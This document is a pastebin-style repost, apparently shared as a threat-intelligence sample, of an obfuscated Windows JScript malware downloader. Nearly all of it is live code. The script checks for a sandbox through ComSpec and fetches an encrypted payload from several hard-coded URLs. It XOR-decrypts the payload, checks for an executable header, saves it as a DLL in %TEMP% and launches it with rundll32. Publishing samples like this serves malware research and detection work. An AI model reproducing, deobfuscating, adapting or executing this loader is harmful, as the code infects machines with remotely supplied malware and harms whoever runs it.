malicious javascript

1. Malicious Javascript
2. *****
3. extracted from here http://pastebin.com/KLeyZmqK
4. *****
5. function d(){
6. var _wds = "W"+"S"+"cr"+"ipt";
7. var _c = "\%S"+"yst"+"emRoot\%\\system32\\cmd."+"ex"+"e";
8. var _zds = this[_wds]["C"+"reateObject"](_wds+".Shell");
9. var se = _zds["E"+"n"+"vi"+"ronmen"+"t"]("S"+"Y"+"S"+"TEM");
10. var _dd = se("Co"+"mSpe"+"c");
11. if (_dd == _c) {return 1;}
12. else {WScript["Q"+"uit"](1);};
13. }
14. d();
15.  
16. var TCe = "n" + "";
17. var Gm = "joi" + "";
18. var WRt = "e" + "";
19. var IEi = "od" + "";
20. var YHo = "harC" + "";
21. var Wg = "fromC" + "";
22. var Zl9 = "th" + "";
23. var Su = "leng" + "";
24. var Or3 = "se" + "";
25. var Ji5 = "clo" + "";
26. var GBf5 = "oFile" + "";
27. var Ze = "SaveT" + "";
28. var ZFa = "xt" + "";
29. var HBb = "Te" + "";
30. var Wp8 = "ite" + "";
31. var QSa4 = "wr" + "";
32. var Ly = "open" + "";
33. var PQi3 = "et" + "";
34. var Ws = "Chars" + "";
35. var Mr4 = "type" + "";
36. var Xr = "m" + "";
37. var On0 = "ea" + "";
38. var Sz3 = "Str" + "";
39. var Rf = "DB." + "";
40. var ZVg7 = "O" + "";
41. var DMp = "D" + "";
42. var HNc9 = "A" + "";
43. var To = "ct" + "";
44. var Ot3 = "eObje" + "";
45. var Ut = "Creat" + "";
46. var Az9 = "h" + "";
47. var TLv3 = "pus" + "";
48. var NSy = "At" + "";
49. var BEs = "de" + "";
50. var Hx = "rCo" + "";
51. var Hg0 = "cha" + "";
52. var Tz = "gth" + "";
53. var Vv = "len" + "";
54. var TJm = "e" + "";
55. var Wg3 = "clos" + "";
56. var Ta = "xt" + "";
57. var CWl4 = "Te" + "";
58. var LRd7 = "Read" + "";
59. var NOs = "le" + "";
60. var OBc = "omFi" + "";
61. var JSp7 = "adFr" + "";
62. var Cx6 = "Lo" + "";
63. var Cl4 = "open" + "";
64. var PIj = "et" + "";
65. var AXm1 = "ars" + "";
66. var YOe = "Ch" + "";
67. var Ww5 = "type" + "";
68. var Jy = "m" + "";
69. var SHa = "trea" + "";
70. var Cl8 = "DB.S" + "";
71. var HNb = "O" + "";
72. var CZx = "D" + "";
73. var LRu = "A" + "";
74. var Pv1 = "ect" + "";
75. var SMg = "eObj" + "";
76. var Fx = "Creat" + "";
77. var Jo2 = "h" + "";
78. var FWh = "lengt" + "";
79. var Hs = "h" + "";
80. var Cv7 = "lengt" + "";
81. var Vy = "ce" + "";
82. var Ov = "spli" + "";
83. var Xk7 = "th" + "";
84. var QKp = "leng" + "";
85. var Tl3 = "th" + "";
86. var Gf = "leng" + "";
87. var APo0 = "h" + "";
88. var UEs = "ngt" + "";
89. var HOc = "le" + "";
90. var BOr3 = "th" + "";
91. var Pw = "leng" + "";
92. var Vp2 = "h" + "";
93. var QSn = "lengt" + "";
94. var Sx = "p" + "";
95. var LTg6 = "Slee" + "";
96. var NKk = "323" + "";
97. var St1 = "rty " + "";
98. var Sw = ",qwe" + "";
99. var PZm = " " + "";
100. var BJh7 = "n" + "";
101. var XVu = "Ru" + "";
102. var UKo7 = "h" + "";
103. var Vm = "ngt" + "";
104. var PNv3 = "le" + "";
105. var Mq = "ngth" + "";
106. var Mk2 = "le" + "";
107. var Ar5 = "ose" + "";
108. var ZTh6 = "cl" + "";
109. var PGi5 = "ile" + "";
110. var EPt8 = "eToF" + "";
111. var HHs = "Sav" + "";
112. var NSp3 = "tion" + "";
113. var As6 = "posi" + "";
114. var Yz0 = "dy" + "";
115. var YWz = "nseBo" + "";
116. var Uc = "po" + "";
117. var Cx = "Res" + "";
118. var Jh = "te" + "";
119. var Uj = "wri" + "";
120. var Nr9 = "type" + "";
121. var IHh = "open" + "";
122. var WXz = "eam" + "";
123. var Wq = ".Str" + "";
124. var OUy = "DB" + "";
125. var OJs9 = "O" + "";
126. var Vf = "D" + "";
127. var BVa0 = "A" + "";
128. var Rb2 = "t" + "";
129. var Fq0 = "bjec" + "";
130. var Qv = "eO" + "";
131. var VSo5 = "eat" + "";
132. var QWh5 = "Cr" + "";
133. var Lc = "eep" + "";
134. var Wz = "Sl" + "";
135. var Yj = "send" + "";
136. var Ea0 = "th" + "";
137. var Ip = "leng" + "";
138. var PYg = "GET" + "";
139. var ECj5 = "en" + "";
140. var Bs5 = "op" + "";
141. var MLx = "th" + "";
142. var BIk = "leng" + "";
143. var Nb8 = "Quit" + "";
144. var Bs = "pt" + "";
145. var XYu = "WScri" + "";
146. var IDd2 = "sts" + "";
147. var VWu = "Exi" + "";
148. var Gv7 = "File" + "";
149. var Ma7 = "t" + "";
150. var QPl = ".tx" + "";
151. var SJl = "s" + "";
152. var UTy3 = "xist" + "";
153. var ESf0 = "leE" + "";
154. var Tp = "Fi" + "";
155. var WZg = "ct" + "";
156. var LVk = "je" + "";
157. var Nr = "mOb" + "";
158. var Gd = "te" + "";
159. var BNv1 = "Sys" + "";
160. var Dj0 = "le" + "";
161. var Ym = "ng.Fi" + "";
162. var PTq = "pti" + "";
163. var Kp9 = "Scri" + "";
164. var Go7 = "ject" + "";
165. var Dx = "eOb" + "";
166. var Dv = "eat" + "";
167. var Jn = "Cr" + "";
168. var RVm = "h" + "";
169. var Yx4 = "lengt" + "";
170. var FXl8 = ".1" + "";
171. var Vn = ".5" + "";
172. var Pi0 = "uest" + "";
173. var IPm = "Req" + "";
174. var Ki = "Http" + "";
175. var AYg = "in" + "";
176. var GTp = ".W" + "";
177. var RXm8 = "ttp" + "";
178. var SXn = "WinH" + "";
179. var Lx2 = "P" + "";
180. var Ny6 = "TT" + "";
181. var ZHe = "XMLH" + "";
182. var QFj0 = "ML2." + "";
183. var Jz = "MSX" + "";
184. var Jd = "r" + "";
185. var Ua = "floo" + "";
186. var Op0 = "%SystemRoot%\\system32\\rundll32.exe" + "";
187. var XEo1 = "%SystemRoot%\\SysWOW64\\rundll32.exe" + "";
188. var Za = "amd64" + "";
189. var Fb8 = "URE" + "";
190. var Kk2 = "TECT" + "";
191. var GXj = "HI" + "";
192. var Ey7 = "RC" + "";
193. var CMz6 = "OR_A" + "";
194. var PWd = "SS" + "";
195. var Mm8 = "PROCE" + "";
196. var TYr1 = "stem" + "";
197. var Cl1 = "Sy" + "";
198. var MPi9 = "ll" + "";
199. var FXo = ".d" + "";
200. var ABx = "BK" + "";
201. var DQo = "rr" + "";
202. var BFi = "jX" + "";
203. var HNn0 = "uO" + "";
204. var Yu0 = "mqa" + "";
205. var FHs = "W41" + "";
206. var XAd = "MP%/" + "";
207. var Hs7 = "%TE" + "";
208. var Av4 = "ll" + "";
209. var HYr = ".She" + "";
210. var Ru4 = "cript" + "";
211. var Jr9 = "WS" + "";
212. var AId5 = "ct" + "";
213. var DQe = "bje" + "";
214. var Ao4 = "ateO" + "";
215. var OMi0 = "Cre" + "";
216. var XGx = "cb" + "";
217. var Xz = "8a" + "";
218. var Su1 = "/0b" + "";
219. var HDm = "d.ws" + "";
220. var DFe5 = "orl" + "";
221. var ZPg = "tw" + "";
222. var Yu8 = "ho" + "";
223. var Je1 = "ng" + "";
224. var Vg = "ki" + "";
225. var LJz3 = "oo" + "";
226. var Li5 = "//b" + "";
227. var Ya = ":" + "";
228. var Wq6 = "http" + "";
229. var Ci5 = "63j" + "";
230. var Vm0 = "2" + "";
231. var ZZq9 = "et/y" + "";
232. var Cc5 = ".n" + "";
233. var BYt = "n" + "";
234. var Ui4 = "oti" + "";
235. var ALt = "rr" + "";
236. var Zn4 = ".a" + "";
237. var Vc9 = "ww" + "";
238. var Qc7 = "//w" + "";
239. var DSl = ":" + "";
240. var Nu0 = "tp" + "";
241. var HGm1 = "ht" + "";
242. var Sk6 = "7h" + "";
243. var HNu = "zvs" + "";
244. var St0 = "e/" + "";
245. var Qn = "d" + "";
246. var LDc = "e." + "";
247. var Ag = "in" + "";
248. var EDt = "nl" + "";
249. var Gq8 = "-o" + "";
250. var Cj3 = ".t" + "";
251. var Po = "age" + "";
252. var UTt = "ep" + "";
253. var OZv8 = "om" + "";
254. var Vg7 = ".h" + "";
255. var Tu6 = "e" + "";
256. var Jp = "neck" + "";
257. var Fs = "ae" + "";
258. var Jc = "-j" + "";
259. var Vw = "ven" + "";
260. var Cl0 = "s" + "";
261. var ZDn = "//" + "";
262. var DFu = "p:" + "";
263. var VBg = "htt" + "";
264. var Gy9 = "23" + "";
265. var Ho4 = "21d" + "";
266. var PRi5 = "vj0" + "";
267. var Vy4 = "m/" + "";
268. var Ik = ".co" + "";
269. var Zn1 = "ri" + "";
270. var ZKb = "ie" + "";
271. var Zz = "gl" + "";
272. var Nu = "ca" + "";
273. var Af1 = "-s" + "";
274. var So = "ba" + "";
275. var Sq6 = "ww.el" + "";
276. var AYc8 = "w" + "";
277. var YOv7 = "//" + "";
278. var Ly5 = "tp:" + "";
279. var GBr2 = "ht" + "";
280. var Cn = "7b" + "";
281. var FOl7 = "s1" + "";
282. var Sv = "ox" + "";
283. var ORq = "p" + "";
284. var Ow9 = "de/" + "";
285. var JPy = "ne." + "";
286. var Ke = "nli" + "";
287. var Fb = "-o" + "";
288. var Fb9 = "t" + "";
289. var NZa2 = "ge." + "";
290. var Pf = "a" + "";
291. var Rj = "mep" + "";
292. var MEw1 = "e.ho" + "";
293. var GYy = "ic" + "";
294. var Pa = "erv" + "";
295. var DSx = "s" + "";
296. var Pg = "ter" + "";
297. var VKq = "pu" + "";
298. var Tj4 = "om" + "";
299. var Cl = "-c" + "";
300. var Hb = "go" + "";
301. var VSv = "ja" + "";
302. var Gd5 = "://" + "";
303. var XQb1 = "tp" + "";
304. var MMo = "ht" + "";
305. var Cs5 = "437" + "";
306. var Fj = "h" + "";
307. var SCv6 = "ngt" + "";
308. var Hu1 = "le" + "";
309. var SQk2 = "E" + "";
310. var TAh2 = "EEE" + "";
311. var Ga6 = "EEEEE" + "";
312. var YNi3 = "EEEE" + "";
313. var Sv1 = "EEEE" + "";
314. var Iy2 = "EEEEE" + "";
315. var Km1 = "EEE" + "";
316. var Lu6 = "EE" + "";
317. var FCp9 = "EEEE" + "";
318. var Tq6 = "EEEEE" + "";
319. var Bf9 = "EEEE" + "";
320. var Ap8 = "fd" + "";
321. var Yu = "sdfas" + "";
322. var FEo3 = "asfa" + "";
323. var HAj = "h" + "";
324. var GZc = "lengt" + "";
325. var KBk4 = "EE" + "";
326. var HJs = "EEEE" + "";
327. var YRz = "EEEE" + "";
328. var Vo3 = "EEE" + "";
329. var HEk4 = "EEEE" + "";
330. var Pm2 = "EEEE" + "";
331. var MOk0 = "EEEE" + "";
332. var Tr7 = "th" + "";
333. var Io6 = "ng" + "";
334. var IXj2 = "le" + "";
335. var Ty = "E" + "";
336. var Ix = "EEEEE" + "";
337. var SGz = "EEE" + "";
338. var Fp = "EE" + "";
339. var ETi8 = "EEEE" + "";
340. var HEa6 = "EEEEE" + "";
341. var ZXv = "EEEE" + "";
342. var Pp9 = "EE" + "";
343. var FOt = "EE" + "";
344. var RCp2 = "EEE" + "";
345. var Un = "EEE" + "";
346. var LKr = "EEEE" + "";
347. var Cg = "EEEEE" + "";
348. var Tq = "EEEEE" + "";
349. var Ni0 = "EEEEE" + "";
350. var NPb = "EE" + "";
351. var Bq = "32" + "";
352. var EAt7 = "231" + "";
353. var CZc7 = "11" + "";
354. var Hn=(CZc7 + EAt7 + Bq, NPb + Ni0 + Tq + Cg + LKr + Un + RCp2 + FOt + Pp9 + ZXv + HEa6 + ETi8 + Fp + SGz + Ix + Ty);
355. var Uv=Hn[IXj2 + Io6 + Tr7];
356. var WBe=(MOk0 + Pm2 + HEk4 + Vo3 + YRz + HJs + KBk4);
357. var Vu = [5708, 19306, 8690];
358. var Ww=WBe[IXj2 + Io6 + Tr7];
359. var MOk3=(FEo3 + Yu + Ap8, Bf9 + Tq6 + FCp9 + Lu6 + Km1 + Iy2 + Sv1 + YNi3 + Ga6 + TAh2 + SQk2);
360. var Ma6=MOk3[IXj2 + Io6 + Tr7];
361.  
362. var Yz=1;
363. var Fm=2;
364. var Nt5=2;
365. var Xl3="437";
366.  
367. var IGv7=[MMo+XQb1+Gd5 + VSv+Hb+Cl+Tj4+VKq+Pg + DSx+Pa + GYy+MEw1+Rj + Pf+NZa2 + Fb9+Fb+Ke+JPy+Ow9 + ORq+Sv+FOl7 + Cn, MMo+Ly5+YOv7 + AYc8+Sq6+So+Af1+Nu + Zz+ZKb + Zn1+Ik+Vy4+PRi5+Ho4+Gy9, VBg+DFu + ZDn + Cl0+Vw+Jc + Fs+Jp + Tu6+Vg7+OZv8 + UTt+Po+Cj3 + Gq8+EDt+Ag+LDc + Qn+St0+HNu + Sk6, MMo+Ly5+Qc7 + Vc9+Zn4 + ALt+Ui4 + BYt+Cc5+ZZq9 + Vm0+Ci5, Wq6 + Ya+Li5 + LJz3+Vg+Je1 + Yu8+ZPg+DFe5+HDm+Su1+Xz + XGx];
368. var MBi0=WScript[OMi0 + Ao4 + DQe + AId5](Jr9 + Ru4 + HYr + Av4);
369. var XWe=MBi0.ExpandEnvironmentStrings(Hs7 + XAd);
370. var NQf6=XWe + FHs + Yu0 + HNn0 + BFi + DQo + ABx;
371. var GLq=NQf6 + FXo + MPi9;
372.  
373. var Uw = MBi0.Environment(Cl1 + TYr1);
374. if (Uw(Mm8 + PWd + CMz6 + Ey7 + GXj + Kk2 + Fb8).toLowerCase() == "amd64")
375. {
376. var UFn4 = MBi0.ExpandEnvironmentStrings(XEo1);
377. }
378. else
379. {
380. var UFn4 = MBi0.ExpandEnvironmentStrings(Op0);
381. }
382.  
383. function random(range, s)
384. {
385. s[1 * 0] = 171 * s[0] % 30269;
386. s[1] = (-2696 + 2868) * s[1] % (21124 + 9183);
387. s[-4870 + 4872] = 170 * s[2] % 30323;
388. var r = (s[0]/(127 * 238 + 43) + s[1]/30307 + s[2]/30323) % 1.0;
389. return Math[Ua + Jd](r * range);
390. }
391.  
392. var SPz0=[Jz + QFj0 + ZHe + Ny6 + Lx2, SXn + RXm8 + GTp + AYg + Ki + IPm + Pi0 + Vn + FXl8];
393.  
394. for (var Lp9=0; Lp9 < SPz0[IXj2 + Io6 + Tr7]; Lp9++)
395. {
396. try
397. {
398. var MTm6=WScript[OMi0 + Ao4 + DQe + AId5](SPz0[Lp9]);
399. break;
400. }
401. catch (e)
402. {
403. continue;
404. }
405. };
406.  
407. var OPr3 = "";
408. var fso = new ActiveXObject(Kp9 + PTq + Ym + Dj0 + BNv1 + Gd + Nr + LVk + WZg);
409.  
410. var ENa6 = Vu.slice();
411. ENa6[0] = (ENa6[0] + 12345) % 30000;
412.  
413. var ELs=1;
414. do
415. {
416. if (fso[Tp + ESf0 + UTy3 + SJl](GLq))
417. {
418. var Em = fso.GetFile(GLq);
419. var Nq = Em.ShortPath;
420. OPr3 = Nq+QPl + Ma7;
421. if (fso[Tp + ESf0 + UTy3 + SJl](OPr3)) {this[XYu + Bs][Nb8](0);}
422. }
423.  
424. var HFw3 = random(IGv7[IXj2 + Io6 + Tr7], ENa6);
425.  
426. try
427. {
428. if (1== ELs)
429. {
430. MTm6[Bs5 + ECj5](PYg, IGv7[HFw3++ % IGv7[IXj2 + Io6 + Tr7]], false);
431. MTm6[Yj]();
432. }
433.  
434. if (MTm6.readystate < 4)
435. {
436. WScript[Wz + Lc](5391 - 5291);
437. continue;
438. }
439.  
440. var Nf=WScript[OMi0 + Ao4 + DQe + AId5](BVa0+Vf+OJs9+OUy + Wq + WXz);
441. Nf[Bs5 + ECj5]();
442. Nf[Nr9]=Yz;
443. Nf[Uj + Jh](MTm6[Cx + Uc + YWz + Yz0]);
444. Nf[As6 + NSp3]=0;
445. Nf[HHs + EPt8 + PGi5](NQf6, Nt5);
446. Nf[ZTh6 + Ar5]();
447.  
448. var CJf2=OMb(NQf6);
449. CJf2=HIi(CJf2);
450. if (CJf2[IXj2 + Io6 + Tr7] < (9 * 11 + 1) * 1024 || CJf2[IXj2 + Io6 + Tr7] > 230 * 1024 || !XHw6(CJf2))
451. {
452. ELs=1;
453. continue;
454. }
455. try
456. {
457. IGi2(GLq, CJf2);
458. }
459. catch (e) {break;};
460.  
461. var Em = fso.GetFile(GLq);
462. var Nq = Em.ShortPath;
463.  
464. MBi0[XVu + BJh7](UFn4 + PZm + Nq + Sw + St1 + NKk);
465. WScript.Sleep(3000);
466. }
467. catch (e) {WScript[Wz + Lc](2922 - 1922); continue;};
468. } while (ELs);
469.  
470. WScript.Quit(0);
471.  
472. function HIi(JEc3)
473. {
474. var AJf /* W */;
475. var TIk = Vu.slice();
476.  
477. for (var Lp9=0; Lp9 < JEc3[IXj2 + Io6 + Tr7]; Lp9++)
478. {
479. JEc3[Lp9] ^= random(256, TIk);
480. }
481.  
482. var Zm6=JEc3[JEc3[IXj2 + Io6 + Tr7]-4] | JEc3[JEc3[IXj2 + Io6 + Tr7]-3] << 8 | JEc3[JEc3[IXj2 + Io6 + Tr7]-2] << 16 | JEc3[JEc3[IXj2 + Io6 + Tr7]-1] << 24;
483. JEc3[Ov + Vy](CJf2[IXj2 + Io6 + Tr7]-4, 4);
484.  
485. AJf=Uv;
486. for (var Lp9=0; Lp9 < JEc3[IXj2 + Io6 + Tr7]; Lp9++)
487. {
488. AJf=(AJf /* W */ + JEc3[Lp9]) % 0x100000000;
489. };
490. if (AJf /* W */ != Zm6) {return [];};
491.  
492. return JEc3;
493. };
494.  
495.  
496. function XHw6(JEc3)
497. {
498. if (JEc3[0]== 0x4D && JEc3[1]== 0x5a)
499. {return true;}
500. else
501. {return false;}
502. };
503.  
504.  
505. function OMb(Lj4 /* W */)
506. {
507. var QAl8=WScript[OMi0 + Ao4 + DQe + AId5](BVa0+Vf+OJs9+OUy + Wq + WXz);
508. QAl8[Nr9]=Fm;
509. QAl8[YOe + AXm1 + PIj]=Xl3;
510. QAl8[Bs5 + ECj5]();
511. QAl8[Cx6 + JSp7 + OBc + NOs](Lj4 /* W */);
512. var DAb4=QAl8[LRd7 + CWl4 + Ta];
513. QAl8[ZTh6 + Ar5]();
514. return St(DAb4 /* W */);
515. };
516.  
517.  
518. function St(IBx3)
519. {
520. var Vi5=new Array();
521.  
522. Vi5[199]=6909 - 6781;
523. Vi5[252]=129;
524. Vi5[233]=130;
525. Vi5[226]=131;
526. Vi5[228]=132;
527. Vi5[224]=133;
528. Vi5[229]=134;
529. Vi5[231]=135;
530. Vi5[234]=136;
531. Vi5[2297 - 2062]=137;
532. Vi5[232]=138;
533. Vi5[239]=139;
534. Vi5[238]=140;
535. Vi5[77 * 3 + 5]=141;
536. Vi5[2487 - 2291]=142;
537. Vi5[197]=143;
538. Vi5[201]=144;
539. Vi5[230]=145;
540. Vi5[198]=146;
541. Vi5[244]=147;
542. Vi5[246]=148;
543. Vi5[242]=149;
544. Vi5[251]=150;
545. Vi5[-6227 + 6476]=10053 - 9902;
546. Vi5[255]=17 * 8 + 16;
547. Vi5[214]=153;
548. Vi5[-7844 + 8064]=154;
549. Vi5[6 * 27]=155;
550. Vi5[34 * 4 + 27]=156;
551. Vi5[165]=2106 - 1949;
552. Vi5[8320 + 39]=158;
553. Vi5[402]=35 * 4 + 19;
554. Vi5[4685 - 4460]=160;
555. Vi5[237]=42 * 3 + 35;
556. Vi5[243]=162;
557. Vi5[56 * 4 + 26]=69 * 2 + 25;
558. Vi5[42 * 5 + 31]=28 * 5 + 24;
559. Vi5[209]=165;
560. Vi5[170]=2 * 83;
561. Vi5[186]=12 * 13 + 11;
562. Vi5[191]=168;
563. Vi5[1820 + 7156]=169;
564. Vi5[172]=170;
565. Vi5[189]=171;
566. Vi5[188]=-4296 + 4468;
567. Vi5[161]=173;
568. Vi5[278 - 107]=2922 - 2748;
569. Vi5[187]=175;
570. Vi5[9617]=8046 - 7870;
571. Vi5[7254 + 2364]=177;
572. Vi5[9619]=178;
573. Vi5[9474]=179;
574. Vi5[3485 * 2 + 2538]=2213 - 2033;
575. Vi5[9569]=38 * 4 + 29;
576. Vi5[9570]=182;
577. Vi5[5257 + 4301]=183;
578. Vi5[9557]=526 - 342;
579. Vi5[12014 - 2443]=185;
580. Vi5[9553]=186;
581. Vi5[9559]=65 * 2 + 57;
582. Vi5[18523 - 8958]=188;
583. Vi5[14656 - 5092]=1751 - 1562;
584. Vi5[9563]=-6810 + 7000;
585. Vi5[9488]=93 * 2 + 5;
586. Vi5[9492]=70 * 2 + 52;
587. Vi5[9524]=193;
588. Vi5[9516]=-2747 + 2941;
589. Vi5[9500]=195;
590. Vi5[9472]=5833 - 5637;
591. Vi5[9532]=9256 - 9059;
592. Vi5[9566]=198;
593. Vi5[9567]=199;
594. Vi5[9562]=-4520 + 4720;
595. Vi5[9556]=201;
596. Vi5[9577]=202;
597. Vi5[9574]=203;
598. Vi5[10646 - 1078]=204;
599. Vi5[9552]=96 * 2 + 13;
600. Vi5[1413 * 6 + 1102]=206;
601. Vi5[9575]=207;
602. Vi5[9576]=208;
603. Vi5[9572]=209;
604. Vi5[9573]=210;
605. Vi5[9561]=211;
606. Vi5[9560]=212;
607. Vi5[9554]=74 * 2 + 65;
608. Vi5[9555]=214;
609. Vi5[9579]=6492 - 6277;
610. Vi5[9578]=-6972 + 7188;
611. Vi5[9496]=217;
612. Vi5[9484]=218;
613. Vi5[3997 + 5611]=219;
614. Vi5[9604]=220;
615. Vi5[9612]=221;
616. Vi5[7279 + 2337]=4701 - 4479;
617. Vi5[9600]=93 * 2 + 37;
618. Vi5[945]=224;
619. Vi5[8891 - 8668]=225;
620. Vi5[9356 - 8441]=226;
621. Vi5[442 * 2 + 76]=227;
622. Vi5[931]=675 - 447;
623. Vi5[5092 - 4129]=229;
624. Vi5[38 * 4 + 29]=230;
625. Vi5[964]=-8470 + 8701;
626. Vi5[934]=5981 - 5749;
627. Vi5[349 * 2 + 222]=-8469 + 8702;
628. Vi5[937]=234;
629. Vi5[948]=4602 - 4367;
630. Vi5[333 * 26 + 76]=9814 - 9578;
631. Vi5[4939 - 3973]=237;
632. Vi5[949]=238;
633. Vi5[8745]=239;
634. Vi5[871 * 10 + 91]=4707 - 4467;
635. Vi5[177]=241;
636. Vi5[8805]=6713 - 6471;
637. Vi5[1553 * 5 + 1039]=243;
638. Vi5[16915 - 7923]=244;
639. Vi5[18544 - 9551]=245;
640. Vi5[247]=8299 - 8053;
641. Vi5[8776]=-460 + 707;
642. Vi5[176]=248;
643. Vi5[8729]=249;
644. Vi5[183]=-9552 + 9802;
645. Vi5[8730]=251;
646. Vi5[8319]=252;
647. Vi5[178]=25 * 10 + 3;
648. Vi5[3546 + 6086]=254;
649. Vi5[160]=255;
650.  
651. var CJf2=new Array();
652. for (var Lp9=6642 - 6642; Lp9 < IBx3[IXj2 + Io6 + Tr7]; Lp9++)
653. {
654. var El=IBx3[Hg0 + Hx + BEs + NSy](Lp9);
655. if (El < 128)
656. {var IDz0=El;}
657. else
658. {var IDz0=Vi5[El];}
659. CJf2[TLv3 + Az9](IDz0 /* W */);
660. };
661.  
662. return CJf2;
663. };
664.  
665. function IGi2(Lj4 /* W */, JEc3)
666. {
667. var QAl8=WScript[OMi0 + Ao4 + DQe + AId5](BVa0+Vf+OJs9+OUy + Wq + WXz);
668. QAl8[Nr9]=Fm;
669. QAl8[YOe + AXm1 + PIj]=Xl3;
670. QAl8[Bs5 + ECj5]();
671. QAl8[QSa4 + Wp8 + HBb + ZFa](Kx1(JEc3));
672. QAl8[HHs + EPt8 + PGi5](Lj4 /* W */, 2);
673.  
674. QAl8[ZTh6 + Ar5]();
675. };
676.  
677. function Kx1(JEc3)
678. {
679. var Io=new Array();
680.  
681. Io[128]=-247 + 446;
682. Io[129]=252;
683. Io[130]=2 * 116 + 1;
684. Io[131]=226;
685. Io[132]=228;
686. Io[133]=-7031 + 7255;
687. Io[134]=-1331 + 1560;
688. Io[135]=231;
689. Io[136]=234;
690. Io[-9295 + 9432]=235;
691. Io[138]=232;
692. Io[139]=239;
693. Io[140]=238;
694. Io[141]=236;
695. Io[142]=196;
696. Io[143]=197;
697. Io[144]=201;
698. Io[145]=230;
699. Io[146]=198;
700. Io[147]=244;
701. Io[25 * 5 + 23]=7803 - 7557;
702. Io[149]=242;
703. Io[150]=251;
704. Io[151]=249;
705. Io[8432 - 8280]=255;
706. Io[69 * 2 + 15]=214;
707. Io[154]=220;
708. Io[155]=1 * 162;
709. Io[-3490 + 3646]=163;
710. Io[157]=165;
711. Io[158]=3208 * 2 + 1943;
712. Io[159]=402;
713. Io[160]=9705 - 9480;
714. Io[161]=237;
715. Io[162]=-5079 + 5322;
716. Io[-4151 + 4314]=115 * 2 + 20;
717. Io[164]=241;
718. Io[165]=209;
719. Io[65 * 2 + 36]=170;
720. Io[167]=186;
721. Io[168]=191;
722. Io[12 * 14 + 1]=8976;
723. Io[170]=172;
724. Io[171]=5309 - 5120;
725. Io[172]=188;
726. Io[173]=-2562 + 2723;
727. Io[8354 - 8180]=6038 - 5867;
728. Io[-2724 + 2899]=187;
729. Io[176]=9617;
730. Io[177]=4676 * 2 + 266;
731. Io[178]=9619;
732. Io[179]=9474;
733. Io[180]=9508;
734. Io[181]=9569;
735. Io[182]=9570;
736. Io[183]=8233 + 1325;
737. Io[184]=9557;
738. Io[185]=9571;
739. Io[186]=2556 + 6997;
740. Io[187]=9559;
741. Io[188]=5401 + 4164;
742. Io[-5300 + 5489]=9564;
743. Io[190]=4157 * 2 + 1249;
744. Io[191]=15687 - 6199;
745. Io[192]=9492;
746. Io[684 - 491]=9524;
747. Io[-4443 + 4637]=9516;
748. Io[195]=9500;
749. Io[196]=9472;
750. Io[-3660 + 3857]=9532;
751. Io[198]=9566;
752. Io[199]=9567;
753. Io[200]=9562;
754. Io[201]=9556;
755. Io[202]=9577;
756. Io[203]=9574;
757. Io[204]=1121 * 8 + 600;
758. Io[205]=9552;
759. Io[-4810 + 5016]=9580;
760. Io[4790 - 4583]=9575;
761. Io[208]=9576;
762. Io[209]=9572;
763. Io[210]=9573;
764. Io[211]=9561;
765. Io[8449 - 8237]=9560;
766. Io[213]=9554;
767. Io[214]=9555;
768. Io[5752 - 5537]=9579;
769. Io[216]=16927 - 7349;
770. Io[217]=3488 + 6008;
771. Io[3538 - 3320]=14228 - 4744;
772. Io[219]=9608;
773. Io[220]=9604;
774. Io[221]=9612;
775. Io[222]=5118 + 4498;
776. Io[223]=9600;
777. Io[224]=945;
778. Io[104 * 2 + 17]=2542 - 2319;
779. Io[5385 - 5159]=915;
780. Io[91 * 2 + 45]=243 * 3 + 231;
781. Io[228]=931;
782. Io[229]=198 * 4 + 171;
783. Io[3208 - 2978]=181;
784. Io[104 * 2 + 23]=964;
785. Io[12 * 19 + 4]=934;
786. Io[233]=920;
787. Io[3608 - 3374]=5074 - 4137;
788. Io[235]=948;
789. Io[236]=210 * 41 + 124;
790. Io[237]=966;
791. Io[238]=949;
792. Io[239]=8745;
793. Io[240]=8801;
794. Io[241]=177;
795. Io[5941 - 5699]=16800 - 7995;
796. Io[243]=8804;
797. Io[244]=8992;
798. Io[245]=8993;
799. Io[246]=-1242 + 1489;
800. Io[247]=8776;
801. Io[248]=176;
802. Io[85 * 2 + 79]=3151 + 5578;
803. Io[250]=183;
804. Io[251]=8730;
805. Io[252]=8319;
806. Io[253]=178;
807. Io[254]=9632;
808. Io[-1937 + 2192]=160;
809.  
810. var IVi2=new Array();
811. var Gr="";
812. var IDz0 /* W */; var El;
813. for (var Lp9=0; Lp9 < JEc3[IXj2 + Io6 + Tr7]; Lp9++)
814. {
815. IDz0=JEc3[Lp9];
816. if (IDz0 /* W */ < 128)
817. {El=IDz0 /* W */;}
818. else
819. {El=Io[IDz0];}
820. IVi2.push(String[Wg + YHo + IEi + WRt](El));
821. }
822.  
823. Gr=IVi2[Gm + TCe]("");
824.  
825. return Gr;
826. };
827.  
828. ******
829. More FROM @neonprimetime security
830.  
831. http://pastebin.com/u/Neonprimetime
832. https://www.virustotal.com/en/USER/neonprimetime/
833. https://twitter.com/neonprimetime
834. https://www.reddit.com/USER/neonprimetime